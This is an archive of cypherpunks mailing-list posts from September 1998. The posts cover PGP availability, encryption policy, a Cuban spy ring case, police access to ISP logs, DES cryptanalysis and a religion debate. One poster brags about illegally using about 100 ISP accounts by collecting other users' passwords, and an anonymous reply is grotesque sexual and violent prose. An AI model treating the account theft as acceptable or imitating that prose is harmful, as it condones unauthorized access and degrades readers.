From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Thu, 17 Sep 1998 13:59:25 +0800
To: cypherpunks@cyberpass.net
Subject: Cyberpunks Signal-to-Noise Ratio
Message-ID: <Pine.LNX.3.96.980917130032.438B-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



Far be it from me to complain about the content-free
nature of others postings, but has anyone else noticed
that the signal on cypherpunks is being lost in the noise?

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolfgang Diemert <diem@bk.bosch.de>
Date: Thu, 17 Sep 1998 06:05:24 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199809171105.NAA17588@bkrzu6.bk.bosch.de>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jia Yan" <yjia@sz.utl.com.hk>
Date: Thu, 17 Sep 1998 00:16:04 +0800
To: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Subject: Re: PGP again....
Message-ID: <00b101bde1f9$da5b1330$e600005e@kenix_pdc.sz.utl.com.hk>
MIME-Version: 1.0
Content-Type: text/plain



ftp://net-dist.mit.edu

-----Original Message-----
From: Bernardo B. Terrado <bbt@mudspring.uplb.edu.ph>
To: cypherpunks@toad.com <cypherpunks@toad.com>
Date: Thursday, September 17, 1998 11:50 AM
Subject: PGP again....


>I've tried looking for PGP and found many.
>All are  platforms for  IBM PC's (using ms dos, windows).
>
>Is there one  for Sun Sparc and the likes or I'll just run the PGP for
>PC's in my Sparc (using unix or PC's using unix).
>
>(forgive me for my lack of info about PGP and platforms).
>
>
>
>
>
>
>
>
>
>
>
>
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~
>Some people they might say that I'm hard to get to know.
>I go my own sweet way, well that maybe so.
>Something about the crowd that makes me walk alone.
>I never had a need in me to be the party's life and soul.
>
>It's me Bernie.
>metaphone@altavista.net
>```````````````````````````````````````````````````````````````````````````
```
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkthomson <jkthomson@bigfoot.com>
Date: Thu, 17 Sep 1998 15:21:10 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <3.0.3.32.19980917131557.006c0a00@dowco.com>
MIME-Version: 1.0
Content-Type: text/plain





makes you wonder what hell they were using for encryption?  DES?


------------------------------

September 17, 1998 Web posted at: 11:16 AM EDT (1516 GMT)

MIAMI (AP) -- The shadowy world of a low-budget Cuban spy ring came to
light in a courtroom, where an FBI agent testified that a suspect's
apartment yielded computer diskettes containing coded references to Fidel
Castro and plans to sabotage an aircraft hangar.

Sounding more and more like a spy novel, details of the group's workings
were revealed in a hearing at which Luis Medina and Manuel Viramontez were
ordered held without bail Wednesday.

Thousands of pages of encrypted computer documents were seized from the
men's apartments.

The men were among 10 rounded up over the weekend and charged Monday with
trying to penetrate U.S. military bases, infiltrate anti-Castro exile
groups and manipulate U.S. media and political organizations. Prosecutors
said it was the biggest Cuban spy ring uncovered in the United States since
Castro took power in 1959.

However, the Pentagon said none of the alleged spies obtained U.S. secrets.

Evidence seized from Viramontez "analyzes the ability to sabotage or cause
damage to airplanes" or a Florida hangar itself," FBI agent Mark de Almeida
testified.

But the network was a low-budget affair, with a Cuban military captain who
lived under the alias Viramontez falling behind on his rent.

The Cuban government "indicated they were supposed to suffer like the rest
of the Cuban people," de Almeida testified in explaining their spartan
lifestyle.

He said diskettes seized from Viramontez' apartment were sprinkled with the
word "comrade" and coded references to "commandante," taken by
investigators to refer to Castro.

Before Viramontez was caught, he had three sets of false identities and
plans to escape to Mexico, Nicaragua or Canada, prosecutors allege. Medina,
said to be a Cuban intelligence major, was ready to flee with a briefcase
containing Puerto Rican identities, a fake birth certificate and $5,000 in
cash.

Eight defendants postponed their bail hearings Wednesday. All 10 were in
solitary confinement at a federal jail.

Viramontez's attorney Paul McKenna said the court, not public opinion, must
decide the case.

"You can't have a lynch mob mentality about this case," said McKenna. "We
have to let our system of justice, our courts, deal with this."

-----------------------------------------------------------------------
 james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh
 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
 ICQ:746241 <keys> at pgp.mit.edu     ...and former sysop of tnbnog BBS
-----------------------------------------------------------------------
Murphy's Military Laws:
3. Friendly fire ain't.
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Thu, 17 Sep 1998 00:49:24 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: DARPA Hires NetAss/TIS TO Develop Secure DNS
In-Reply-To: <3.0.5.32.19980916190027.008d4dc0@idiom.com>
Message-ID: <Pine.LNX.3.96.980917134007.10944C-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 16 Sep 1998, Bill Stewart wrote:

> 
> This is somewhat tacky.  SecureDNS exists, and TIS got export approval
> a while back to publish a "bones" version, minus encryption routines.
> John Gilmore and his lawyer decided that, since it only does authentication,
> not message encryption, it should be ok to publish _with_ the crypto
> algorithms, and it's been quietly sitting on his web pages.
> Recently the Feds sent him a letter saying "Oh, no, we didn't mean
> it was OK to publish/export this encryption-based authentication system
> just because the law says you can, so stop it"....
> Now they're paying for another version.  Are they going to try something
> DSS-based instead of RSA, just so you don't need encryption-capable
> crypto with it, or is this going to be another scam?
> Or is it just different parts of the Feds not talking to each other?

Maybe they suddenly felt the need to be able to backdoor DNS hijacking.
(Maybe the reason TIS is involved...)

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 17 Sep 1998 15:48:54 +0800
To: cypherpunks@cyberpass.net
Subject: House panel OKs son-of-CDA (fwd)
Message-ID: <Pine.GSO.3.95.980917134951.23481f-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Thu, 17 Sep 1998 13:48:43 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: House panel OKs son-of-CDA



http://cgi.pathfinder.com/time/daily/0,2960,14791-101980917,00.

Time Daily
Son of CDA
September 17, 1998
By Jonathan Gregg

   Who should decide what's fit for kids to see online? If Rep. Mike
   Oxley has his way, says TIME correspondent Declan McCullagh, it will
   be "any Bible Belt prosecutor who's itching to make a name for
   himself." Oxley is the sponsor of the Internet decency act that was
   approved by a House Commerce subcommittee Thursday -- a bill that
   bears a striking resemblance to the 1996 Communications Decency Act
   that got the bum's rush from the Supreme Court, 9-0, for being
   unconstitutional.

[...snip...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 17 Sep 1998 13:50:30 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Democracy... (fwd)
Message-ID: <199809171915.OAA15655@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: Democracy... (fwd)
> Date: Thu, 17 Sep 1998 11:29:00 -0700

> > Atheism means that one believes that there is no God.
> 
> You trying to claim atheism is a religion itself is like the christians
> always claiming non-christians are satin worshippers.

Actualy this is a straw man. Very few Christians claim Buddhist, Muslim,
etc. are satan worshipers, Satan is a Christian ephigy. What they *do*
claim is that those folks are worshipping false idols and as a result
won't gain access to heaven at death.

Vasty different than your claim.

> Forget about the
> origination of the word,

There's your first problem, your argument won't stand in the traditional
architecture of society so you want to try to get me to throw it away.
This causes all terms, ideas, etc. to become irrelevant in effect forcing
me to play from a vacuum. Won't do it. Though it's a nice ploy on your
part.

> in today's reality most atheists simply forgo
> religion completely.

A personal philosophy is a religion, different words but same idea. If your
thesis is that for something to be a religion it requires some sort of
social approval you miss the whole point. Even Jesus recognized that a
persons religion didn't rely on a 'church' and the implied infrastructure.
This is the reason he told his listeners to pray in a closet alone.

> There is no reason to think that a god does exist, so why would one even
> need to think about or believe in the negative.

There is no reason to believe one doesn't either. If we take your claim at
face value you need to demonstrate your test that shows the irrelevancy
of god. God is not a belief in a negative, another straw man, but rather
a mechanism or expression of human psychology and the need for humans to
find patterns (ie reason) in things.

> > Ah, so there are personal beliefs that aren't religion and 
> > then there are personal beliefs that are?
> 
> Yes, beliefs based on valid reason,

Ah, another of your mistakes. Religion and by extension faith are not
constrained by reason or logic. It's this realisation that puts some
issues and aspect of human inquiry outside of the reach of science, logic,
etc.

> empiricism and science are not
> religious, the generally follow the path from conjecture to theory to
> fact.

If you're a pantheist they're the only religion (aka personal philosophy)
you've got. Shortcomings in your imagination are not a reflection upon the
rest of the cosmos.

> You may hold lots of personal conjecture that do qualify as
> beliefs but are not religious in nature, they are not exempt from
> empirical evidence and the laws of thermodynamics. Beliefs based on
> faith and mysticism are religious. Religion is irrational.

No, only some religions are irrational. The point you're missing is not
one of rationality or irrationality but rather transcendance.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 17 Sep 1998 16:33:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <a1712719ee819256594b12d6ed1a65ed@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Wednesday, September 16, 1998 - 20:16:25

I'm trying not to be paranoid or anything, but 
the thing is, ... where the heck is everybody??!!

Nomad        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 17 Sep 1998 13:41:17 +0800
To: cypherpunks@toad.com
Subject: SecDef on Crypto, Privacy
Message-ID: <199809171833.OAA01552@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Excerpt from DoD transcription of Secretary of Defense Cohen's
remarks at the Council on Foreign Relations, New York City, 
September 14, 1998:

[Begin]

Let me say one other thing about terrorism.  We in this country 
much recognize the tension which will exist as you ask us, and 
we will ask all successor administrations, to protect us.  And 
you say, how do you protect someone against terrorists?  It means 
increased intelligence.  It means increased intelligence, having 
greater capability on the ground or from national technical 
sources to find out who is planning and plotting what at what 
place and what time.  

To do that is going to put us in somewhat of a direct conflict 
with rights to privacy, something that we hold very dear in this 
country.  So the more intelligence-gathering responsibilities that 
any administration is going to have, there's going to come a point 
of tension and, indeed, friction between how much are you willing 
to give up in order to be secure.  Those are the kind of unpleasant 
choices that are going to be manifesting themselves in the near 
future.  We haven't really faced up to it yet.  We're starting to 
see some of that conflict at least intellectually develop when you 
see the manufacturers of software who don't like the fact that the 
law enforcement, the FBI, the Justice Department wants to have some 
method of getting into encrypted technology. 
 
You say, "Wait a minute, that's my right of privacy.  I'm a 
businessman or woman.  I want to be able to send information out 
over those -- those airwaves and have them completely protected."  
Our Justice Department says, "Wait a minute, you want us to protect 
you.  But you're allowing criminal elements, terrorists and others
 -- organized crime, drug cartels -- to encrypt their 
telecommunications to the point where don't know what's going on.  
And then something is going to happen, and you'll say, where were you?"

So those are the kinds of tensions that are going to continue to exist.  
But we're going to have to have more intelligence to effectively deal 
with terrorism in the future.  

[End excerpt]

Full transcript:

   http://jya.com/wsc091498.htm  (49K)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 17 Sep 1998 16:44:46 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Democracy... (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A192846BB@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Forget about the origination of the word,
> 
> There's your first problem, your argument won't stand in the 

No, there is a strict difference between the defining a word and
defining a philosophy coined after that word. Certainly Marxism,
Leninism and Stalinism all claimed to be Communism, regardless of how
much or little resemblance they bear to a strict definition of the word
communism.

> A personal philosophy is a religion, different words 
> but same idea.

> Religion and by extension faith are not
> constrained by reason or logic.

How do you account for this contradiction. I hold a personal philosophy
that is strictly and absolutely constrained by reason and logic.

> > There is no reason to think that a god does exist, so why 
> > would one even need to think about or believe in the negative.
> 
> There is no reason to believe one doesn't either.

Do you believe in THE FORCE, as described by the great prophet George
Lucas?

If you say "Yes," am I to claim that is your *religious* belief, not
subject to reason, logic or empirical evidence? If you say "No," am I to
assume that is your *religious* belief, not subject to reason, logic or
empirical evidence?

I hold no *religious* beliefs, PERIOD.

You seem to be unable to grasp that concept.

If thinking that everyone holds a religion, even religiously not holding
one(?!), is a way for you to escape rational judgement on your own
ideas, then so be it, discussion on the topic is no longer useful as
this is obviously part of your religious beliefs.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marty Levy" <rwww60@email.sps.mot.com>
Date: Thu, 17 Sep 1998 08:54:19 +0800
To: cypherpunks cypherpunks <cypherpunks@toad.com>
Subject: British Police Attempt To Sidestep E-mail Protection
Message-ID: <36011300.6ED2C07E@email.sps.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



British Police Attempt To Sidestep E-mail Protection

http://www.newsbytes.com/pubNews/118135.html

(09/16/98); 12:22 PM CST
By Steve Gold, Newsbytes
LONDON, ENGLAND,

 Steve Gold, Newsbytes. Newsbytes' sources have
 revealed that the Metropolitan Police have been
 holding a series of low-key discussions with
 major Internet service providers (ISPs) in the
 UK, aiming to streamline police access to e-mail
 and ISP user logs.

 According to one reliable source, the aim of the
 discussions is to develop a ground-breaking
 agreement between the police and ISPs so that,
 where the police have reasonable suspicion that
 an individual is sending or receiving e-mail, or
 downloading images that involve paedophilia,
 then they can formally request full details of
 the Internet user's mailbox and system logs, for
 example, from the ISP in question.

 While the aim of the project is to avoid the
 need for police to obtain a formal court order
 to access the ISP's computer systems, Newsbytes
 expects there to be a massive outcry from civil
 libertarian groups, since the police order could
 well be implemented against anyone with an
 account with a British ISP.

 Newsbytes understands that an expose on the
 police plans will be broadcast on Channel 4 news
 at 19:00 hours on British television this
 evening.

 Newsbytes' sources suggest that British ISPs are
 under immense pressure to comply with the police
 system since, if they do not comply and request
 a court order, the police could theoretically
 impound their computer systems, effectively
 putting an ISP out of action, and perhaps
 business, for an unknown period of time.

 "While I can understand the police wanting to
 gain access to Internet users' files who are
 accessing the Net for paedophile images, this
 does seem something of a steamroller approach,"
 said one industry source who spoke to Newsbytes
 after agreeing anonymity.

 Newsbytes notes that a major flaw exists in the
 British police's modus operandi for the proposed
 system, since the e-mail file servers for
 America Online (AOL) and CompuServe (AOL is the
 UK's largest ISP) are held in the US. Only the
 company's sales and support operations are
 located in the UK.

 "It will be interesting to see how the
 management of AOL and CompuServe in the US react
 to the news that they have to willingly hand
 over user logs and e-mail files to the British
 police," said the anonymous source.

 As has been proven by various cases in the US,
 the normal legal protection afforded postal and
 telephone communications by anti- wiretap
 legislation is not automatically extended to
 include e-mail.

 In the UK, it had been thought that the
 Interception of Communications Act might apply
 to e-mail, but the law relating to e-mail
 remains unproven, Newsbytes notes.

 Reported by Newsbytes News Network,
 http://www.newsbytes.com .

 12:22 CST

 (19980916/WIRES LEGAL, ONLINE/)

 Copyright (c) Post-Newsweek Business
 Information, Inc. All rights reserved.
 -----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 17 Sep 1998 16:52:53 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Cyberpunks Signal-to-Noise Ratio
Message-ID: <33CCFE438B9DD01192E800A024C84A192846BC@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



What! I can't hear you!

You could always filter *aol*, *anon* and *sixdegrees*.

Or shout louder (i.e. contribute signal).

	Matt

> -----Original Message-----
> From: Jim Burnes [mailto:jvb@ssds.com]
> 
> Far be it from me to complain about the content-free
> nature of others postings, but has anyone else noticed
> that the signal on cypherpunks is being lost in the noise?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bmccaffrey@executive.com
Date: Thu, 17 Sep 1998 18:13:55 +0800
To: cypherpunks@sirius.infonex.com
Subject: RE: Cuban encryptors
Message-ID: <4CBEEB8C7D24D211971500A0C98F15BC02EE90@mail.executive.com>
MIME-Version: 1.0
Content-Type: text/plain



Actually, it was RTF.

-----Original Message-----
From: jkthomson [mailto:jkthomson@bigfoot.com]


makes you wonder what hell they were using for encryption?  DES?


------------------------------

September 17, 1998 Web posted at: 11:16 AM EDT (1516 GMT)

MIAMI (AP) -- The shadowy world of a low-budget Cuban spy ring came to
light in a courtroom, where an FBI agent testified that a suspect's
apartment yielded computer diskettes containing coded references to
Fidel
Castro and plans to sabotage an aircraft hangar.

<snip>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@cor.sos.sll.se>
Date: Thu, 17 Sep 1998 08:22:07 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Harald Fragner
In-Reply-To: <199809161517.RAA08343@replay.com>
Message-ID: <Pine.HPP.3.91.980917144859.9984A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 16 Sep 1998, Anonymous wrote:

>I think Harald Fragner has to take you off the list.
>Talk to him about it.

I remember Harald Fragner from a lot of forums on
the Swedish Fidonet back in around 1991-1992. He was
a trusted technophile who had an answer to every single
IMB-PC related question (and most of his answers seemed
accurate).

A search has him now working for IDG Sweden, a publisher of
computer magazines, as head of it's computer department.

http://www1.idg.se/

harald.fragner@idg.se 

I'm sure that Harald could take anybody off any list but it's
questionable if he has the time, or feels like it. :-)


Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 17 Sep 1998 15:27:42 +0800
To: cypherpunks@cyberpass.net
Subject: The DES Analytic Crack Project
Message-ID: <199809172029.PAA20063@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



We are pleased to report that we have obtained our first sponsor.  Two
more, and if everyone is agreeable, we have decided to launch the
project, and get through as much of the early stuff in the FAQ as
possible.
 
Numerous comments on our sponsorship model have indicated that people
want the project results to be widely disseminated, and that exclusive
access is not an incentive for people to sponsor.
 
So - unless we get a lot of people saying that this is not the case,
we will probably just release stuff on the Web site as it becomes
available, along with emailing it to sponsors, and posting summaries
of interesting results to Cypherpunks.

--  
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Thu, 17 Sep 1998 03:33:29 +0800
To: cypherpunks@toad.com
Subject: cryptography and encryption
Message-ID: <Pine.GSO.3.96.980917162538.1008A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



Could I interchange them.
I know that the latter is under the former, but I'm still confused.

Hope you'll understand.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some people they might say that I'm hard to get to know.
I go my own sweet way, well that maybe so.
Something about the crowd that makes me walk alone. 
I never had a need in me to be the party's life and soul.

It's me Bernie.
metaphone@altavista.net
``````````````````````````````````````````````````````````````````````````````




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Thu, 17 Sep 1998 03:33:30 +0800
To: Jia Yan <yjia@sz.utl.com.hk>
Subject: Re: PGP again....
In-Reply-To: <00b101bde1f9$da5b1330$e600005e@kenix_pdc.sz.utl.com.hk>
Message-ID: <Pine.GSO.3.96.980917162948.1245A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 17 Sep 1998, Jia Yan wrote:

> ftp://net-dist.mit.edu

It says permission denied the second time I've tried to enter.





> >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~
> >Some people they might say that I'm hard to get to know.
> >I go my own sweet way, well that maybe so.
> >Something about the crowd that makes me walk alone.
> >I never had a need in me to be the party's life and soul.
> >
> >It's me Bernie.
> >metaphone@altavista.net
> >```````````````````````````````````````````````````````````````````````````
> ```
> >
> >
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AIMSX@aol.com
Date: Thu, 17 Sep 1998 16:11:46 +0800
To: mah248@nyu.edu
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <491b5a5b.36017891@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Hmm, well, you were wrong about many things.
The ISP runs RH5.1

I don't use the passwd file for anything, as it is shadowed.

I don't work there.

I use 100 accounts because it is so easy to get all the new users, and the
changed passwords with the way they are set up, so why stop at one, and if
that one is disabled, I would like something to fall back on.  

You just don't understand anything about why I do what I do.  If you were
illegally using an account, would you want to ONLY have 1?  Why wouldn't you
want to know you had something to fall back on if that one is disabled?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 17 Sep 1998 19:15:23 +0800
To: mgraffam@mhv.net
Subject: Re: your mail
In-Reply-To: <3.0.3.32.19980917131557.006c0a00@dowco.com>
Message-ID: <199809180022.RAA04718@ideath.parrhesia.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:28 PM 9/17/98 -0400, mgraffam@mhv.net wrote:

>Damn.. are cypherpunks the only people in the universe smart enough to use
>PGP?!?

And a lot of good it's done the two who've been busted so far .. doesn't
look like encryption is a serious obstacle to legitimate law enforcement to
me.


--
Greg Broiles        |History teaches that 'Trust us'
gbroiles@netbox.com |is no guarantee of due process.
                    |_Kasler v. Lundgren_, 98 CDOS 1581
                    |(March 4, 1998)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 17 Sep 1998 10:25:15 +0800
To: machita@gurlmail.com
Subject: Re: Nita Daniel
Message-ID: <199809171517.RAA22696@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Oh Nita baby, say it ain't so!  What about all that time in the Congo?
What about those wombat hunting trips on the aborigine plains?  What
about when we made sweet love in a pile of rhinoceros shit, your fecal
fetish winning me over to our true love.

What about when you swore you'd always be true, even as you were
pissing in my mouth?  Oh that acrid, bittersweet flavor of entrails running
through my loins, that ache of razor sharp knives piercing my rectum,
and you said you'd always be there for me baby!

Well fine!  If that's the way you want it, Nita, you parking meter, you
pimple on the face of a whore, you jubilant muskrat sharpener!  Go back
to your twinkie stuffing, you'll never see me again!

Hurting,
Joe Camel


At 11:15 PM 9/16/98 -0500, sixdegrees wrote:
>Just a quick update from sixdegrees(tm). Unfortunately Nita 
>Daniel (machita@gurlmail.com) asked not to be listed as your 
>contact with sixdegrees.
>
>We also wanted to make sure you were aware that you currently 
>have no other confirmed contacts, so it will be hard for you to
>have a productive sixdegrees experience. As you probably know, 
>without any confirmed contacts, you won't get any results from our 
>networking searches. 
>
>So, we just wanted to recommend that you head over to 
>http://www.sixdegrees.com , log-in, and go to MY CONTACTS 
>to list additional relationships. 
>
>
>====================================================================
>PLEASE NOTE: All replies to this address are processed by a computer.
>If you have any problems, questions or requests send an e-mail to 
>issues@sixdegrees.com and someone will get back to you as soon as 
>possible.
>====================================================================
>
>
>E.DB.BRESP.3
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 17 Sep 1998 10:27:07 +0800
To: zac@pulp-fiction.com
Subject: Re: Isaac Lee
Message-ID: <199809171521.RAA23067@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Screw you Isaac Hayes!  I never liked Shaft anyway.  Go back to
South Park you worm!

Saddened,
Joe CypherSyphen


At 12:17 AM 9/17/98 -0500, sixdegrees wrote:
>Just a quick update from sixdegrees(tm). Unfortunately Isaac 
>Lee (zac@pulp-fiction.com) asked not to be listed as your 
>contact with sixdegrees.
>
>We also wanted to make sure you were aware that you currently 
>have no other confirmed contacts, so it will be hard for you to
>have a productive sixdegrees experience. As you probably know, 
>without any confirmed contacts, you won't get any results from our 
>networking searches. 
>
>So, we just wanted to recommend that you head over to 
>http://www.sixdegrees.com , log-in, and go to MY CONTACTS 
>to list additional relationships. 
>
>
>====================================================================
>PLEASE NOTE: All replies to this address are processed by a computer.
>If you have any problems, questions or requests send an e-mail to 
>issues@sixdegrees.com and someone will get back to you as soon as 
>possible.
>====================================================================
>
>
>E.DB.BRESP.3
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Thu, 17 Sep 1998 16:50:44 +0800
To: jkthomson <jkthomson@bigfoot.com>
Subject: Re: your mail
In-Reply-To: <3.0.3.32.19980917131557.006c0a00@dowco.com>
Message-ID: <Pine.LNX.3.96.980917172607.32288D-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 17 Sep 1998, jkthomson wrote:

> makes you wonder what hell they were using for encryption?  DES?


> MIAMI (AP) -- The shadowy world of a low-budget Cuban spy ring came to
> light in a courtroom, where an FBI agent testified that a suspect's
> apartment yielded computer diskettes containing coded references to Fidel
> Castro and plans to sabotage an aircraft hangar.

Note the word coded.

> Thousands of pages of encrypted computer documents were seized from the
> men's apartments.

> He said diskettes seized from Viramontez' apartment were sprinkled with the
> word "comrade" and coded references to "commandante," taken by
> investigators to refer to Castro.

I don't think that the documents were encrypted; I think that, perhaps,
they were just done in a code language.

If they were actually using a cipher system, you do have to wonder what it
was. 

Damn.. are cypherpunks the only people in the universe smart enough to use
PGP?!?

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"They that can give up essential liberty to obtain a little temporary 
 safety deserve neither liberty nor safety." -- Ben Franklin, ~1784




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Thu, 17 Sep 1998 05:16:21 +0800
To: cypherpunks@toad.com
Subject: PGP
Message-ID: <Pine.GSO.3.96.980917173046.5516C-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



Could you send me the source code of the most recent PGP. (for Unix)
My server is very slow like a turtle.
I don't mind if it's large.

Could you please.

Thank you.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some people they might say that I'm hard to get to know.
I go my own sweet way, well that maybe so.
Something about the crowd that makes me walk alone. 
I never had a need in me to be the party's life and soul.

It's me Bernie.
metaphone@altavista.net
``````````````````````````````````````````````````````````````````````````````




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Thu, 17 Sep 1998 12:53:04 +0800
To: AIMSX@aol.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
In-Reply-To: <5e38fbca.36006a19@aol.com>
Message-ID: <36014AD4.11C504D0@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



This still doesn't explain why you think you need 100 accounts on the
same ISP.  All an account is is a login/password pair.  wtf do you use
100 *different* accounts for?  Email bombing?  Some kinda sick means of
avoiding spam mail from posting on Usenet? *rototflmao*

I suppose that if your ISP has 100 computers on its internal network,
and your login works on each one of them, you could say, technically,
that you have 100 accounts.  Of course, since your ISP is probably
running Solaris, that's a somewhat silly thing to say, as it is likely
that the /etc/passwd (or equivalent) file is NFS mounted over the whole
network, and your home directories are almost certainly NFS mounted from
a constant HD (located somewhere in the depths of the network), from
machine to machine.

Hell, I worked at Sun over the summer.  *I* had an account there, and
could login to any of the several hundred machines we had on our subnet
of SWAN.  Does that mean that I should go around saying "Yeah, I have
like, 500 shell accounts where *I* work, which proves I'm a VSC (Very
Smart Cookie), or at least not an AOLuser" *lol*

Get over it kid, you've either got a single account, which exists on a
bunch of different machines, or your ISP is even more retarded than AOL.
:)


AIMSX@aol.com wrote:
> 
> Hmm... have you ever thought... that my mother may not exactly love the 
> idea
> of me having access to other people's accounts... so I need to do what she
> DOES condone?  You just don't seem to be using your brain.
> 
> >Some of them have over 100 accounts on the same ISP, and are
> >truly so full of shit, that they're swimming in it.  Kid, by bullshiting, 
> >all
> >you're doing is enforcing the view that AOL users are really AOLusers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nicolas Robidoux <N.Robidoux@massey.ac.nz>
Date: Thu, 17 Sep 1998 01:09:45 +0800
To: jf_avon@citenet.net
Subject: CAD $
In-Reply-To: <199809161614.MAA06660@cti06.citenet.net>
